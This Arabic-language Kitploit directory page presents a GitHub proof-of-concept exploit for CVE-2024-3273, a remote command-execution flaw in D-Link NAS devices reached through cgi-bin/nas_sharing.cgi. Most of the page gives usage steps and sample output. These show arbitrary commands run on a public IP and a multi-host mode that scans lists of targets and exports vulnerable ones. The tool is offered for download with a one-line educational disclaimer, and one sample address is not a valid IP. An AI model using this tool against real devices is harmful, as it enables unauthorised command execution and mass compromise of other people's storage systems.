Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3273 — استغلال لـ CVE-2024-3273، يدعم المضيفين الفرديين والمتعددين | Kitploit
أدوات/GitHubGitHub/adhikara13/cve-2024-3273
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

استغلال لـ CVE-2024-3273، يدعم المضيفين الفرديين والمتعددين

عرض المستودع
1311منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3273 إثبات المفهوم (PoC)

يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2024-3273، وهي ثغرة أمنية تم اكتشافها في أجهزة D-Link NAS. تسمح الثغرة للمهاجمين بتنفيذ أوامر عشوائية على الأجهزة المعرضة للخطر.

الوصف

CVE-2024-3273 هي ثغرة في أجهزة D-Link NAS تسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية عبر طلب HTTP مصمم خصيصًا إلى نقطة النهاية cgi-bin/nas_sharing.cgi.

يوضح إثبات المفهوم هذا كيف يمكن استغلال الثغرة لتنفيذ أوامر على أجهزة D-Link NAS المعرضة للخطر.

المتطلبات

  • Python 3.x
  • مكتبة requests

الاستخدام

  1. استنساخ هذا المستودع:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. الانتقال إلى دليل المستودع:

    root@kitploit:~
    cd CVE-2024-3273
    
  3. تشغيل إثبات المفهوم:

    root@kitploit:~
python main.py
  • اتباع التعليمات على الشاشة لاختيار الجهاز الهدف:

    • الخيار 1: مضيف واحد (1): أدخل تفاصيل لجهاز هدف واحد، بما في ذلك عنوان IP للمضيف والأمر المراد تشغيله.
    • الخيار 2: مضيفين متعددين (2): قدم ملفًا يحتوي على أجهزة هدف متعددة بالتنسيق host:port، واختر ما إذا كنت تريد تصدير المضيفين المعرضين للخطر إلى vulnerables.txt.
  • مثال

    root@kitploit:~
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.
    

    إخلاء مسؤولية

    إثبات المفهوم هذا مخصص للأغراض التعليمية والبحثية فقط. استخدمه بمسؤولية وعلى الأجهزة التي لديك إذن باختبارها فقط.

    المساهمة

    المساهمات مرحب بها! إذا وجدت أي مشكلات أو تحسينات، فلا تتردد في فتح مشكلة أو إنشاء طلب سحب.

    تنزيل الأداة